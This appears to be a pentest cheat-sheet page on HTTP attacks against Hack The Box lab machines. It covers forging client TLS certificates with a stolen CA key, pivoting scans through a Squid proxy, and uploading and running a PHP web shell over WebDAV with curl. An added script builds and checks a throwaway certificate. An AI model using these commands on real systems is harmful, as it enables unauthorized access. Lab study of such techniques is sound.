P4n1cBook

HTTP/HTTPS

HyperText Transfer Protocol - Port 80/443


Last updated 2 months ago

Generate a TLS Certificate

With the CA private key already in hand:

  1. Verify the server's client certificate requirements:

openssl s_client -connect 10.10.10.131:443

  2. Generate the client's private key:

openssl genrsa -out client.key 4096

  3. Create a certificate signing request (CSR); make sure the subject fields match what the server expects:

openssl req -new -key client.key -out client.req

  4. Sign the CSR with the CA's private key to issue the client certificate (-extensions client selects a section from a file passed with -extfile; without -extfile no extensions are added to the certificate):

openssl x509 -req -in client.req -CA lacasadepapel-htb.pem -CAkey ca.key -set_serial 101 -extensions client -days 365 -outform PEM -out client.cer

  5. Convert the private key and certificate into a PKCS#12 (.p12) file for easy import into a browser or client:

openssl pkcs12 -export -inkey client.key -in client.cer -out client.p12

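The whole procedure above run end to end, as an added example that is not part of the original page: it stands up a throwaway CA, issues the client certificate and .p12, then checks the result the way a relying party would (chain validates, clientAuth EKU present, .p12 opens). It assumes openssl is on PATH; the CA name, subjects and the p12 password are constructed stand-ins for the page's ca.key and lacasadepapel-htb.pem.

```shell
#!/bin/bash
# Added example, not from the P4n1cBook page: runs the client-certificate
# procedure above end to end against a throwaway CA and checks the result.
# Assumptions: openssl on PATH; the CA (lab-ca), subject names and the p12
# password "changeit" are constructed stand-ins for the page's ca.key and
# lacasadepapel-htb.pem.
set -eu

# Builds the cert in a fresh temp dir, verifies it, prints the dir path.
make_client_cert() (
  work=$(mktemp -d)
  cd "$work"

  # Throwaway CA standing in for the page's ca.key / lacasadepapel-htb.pem
  openssl req -x509 -newkey rsa:2048 -nodes -keyout ca.key -out ca.pem \
    -days 365 -subj "/CN=lab-ca" 2>/dev/null

  # The [client] section that "-extensions client" refers to; it only takes
  # effect when handed to openssl x509 via -extfile.
  cat > ext.cnf <<'EOF'
[client]
basicConstraints = CA:FALSE
keyUsage = digitalSignature, keyEncipherment
extendedKeyUsage = clientAuth
EOF

  # Steps 2-5 from the page, made non-interactive with -subj / -passout
  openssl genrsa -out client.key 4096 2>/dev/null
  openssl req -new -key client.key -out client.req -subj "/CN=client" 2>/dev/null
  openssl x509 -req -in client.req -CA ca.pem -CAkey ca.key -set_serial 101 \
    -extfile ext.cnf -extensions client -days 365 -outform PEM \
    -out client.cer 2>/dev/null
  openssl pkcs12 -export -inkey client.key -in client.cer -out client.p12 \
    -passout pass:changeit

  # Checks a relying party cares about: chains to the CA, carries the
  # clientAuth EKU, and the .p12 opens with its password.
  openssl verify -CAfile ca.pem client.cer >/dev/null
  openssl x509 -in client.cer -noout -text > client.txt
  grep -q 'TLS Web Client Authentication' client.txt
  openssl pkcs12 -in client.p12 -passin pass:changeit -nokeys -noout 2>/dev/null
  echo "$work"
)

# Negative check: the leaf cert is not accepted when some other cert is the
# trust anchor (here the leaf itself, which is not its issuer).
wrong_ca_rejected() (
  cd "$1"
  ! openssl verify -CAfile client.cer client.cer >/dev/null 2>&1
)
```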
Squid Proxy

Port 3128

  • The config file normally lives in /etc/squid/squid.conf.

  • Relies on /usr/lib/squid/basic_ncsa_auth for authentication; that program reads the passwords from /etc/squid/passwords.

  • Check whether the proxy can be used as a pivot into the local network.

  • First add the proxy address and port as the last line of your proxychains.conf file:

http 10.10.10.67 3128

  • Then just nmap the localhost through it (-sT is required: proxychains can only relay full TCP connections, so SYN scans and ICMP do not go through):

proxychains nmap -n -sT 127.0.0.1

Upstream Proxy Server

  1. In Burp, go to Settings > Network > Connections.

  2. Create a new upstream proxy rule with * as the Destination host, the target proxy as the Proxy host/port, and the credentials with the Basic authentication type.

  3. To fuzz the target's localhost, add a Proxy listener bound to the 127.0.0.1:1234 interface that redirects to 127.0.0.1:80.

  4. Then add that interface to /etc/proxychains.conf.

WebDAV

Web Distributed Authoring and Versioning, an extension of HTTP that allows users to collaboratively edit and manage files stored on a remote server.

  • Extends the standard HTTP methods (GET, POST, ...) with PROPFIND, PROPPATCH, MKCOL, DELETE, COPY, MOVE and LOCK.

  • Credentials can be found in webdav.passwd.

  • davtest.pl (see Enumeration below) can be used for enumeration.

Upload files:

curl --upload-file ./file.php --user <UserName>:<Password> http://10.10.10.67/webdav_test_inception/

Run commands through the uploaded file.php web shell:

curl --data-urlencode 'cmd=id' http://webdav_tester:babygurl69@10.10.10.67/webdav_test_inception/file.php
uid=33(www-data) gid=33(www-data) groups=33(www-data)

Enumeration:

davtest.pl -url http://10.10.10.67/webdav_test_inception -auth <UserName>:<Password>